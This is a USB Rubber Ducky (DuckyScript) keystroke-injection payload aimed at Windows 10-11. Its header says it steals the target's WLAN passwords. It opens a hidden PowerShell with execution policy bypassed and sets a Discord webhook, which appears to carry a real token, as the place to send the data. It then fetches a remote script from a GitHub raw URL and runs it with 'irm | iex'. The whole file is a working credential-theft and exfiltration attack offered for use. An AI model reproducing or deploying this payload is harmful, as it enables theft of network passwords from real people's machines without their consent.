REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : Aleff                                            |
REM # Description: A script used to stole target WLAN Passwords.      |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################



DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='

REM Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE DISCORD https://discord.com/api/webhooks/1447492875704205362/VyqK99hc7pwqsloWyBulkjPktt7zdS6QqDLeaUyovN4pFrWMsBD3fP2ue0ubyBYMNGms
STRING DISCORD
REM Provide payload
DEFINE PAYLOAD https://raw.githubusercontent.com/javirufo-ies/hacking/c561c68e0ad541a6dd6e653ef835d86a029adf9b/Windows-Passwords.ps1
STRINGLN ';irm PAYLOAD | iex
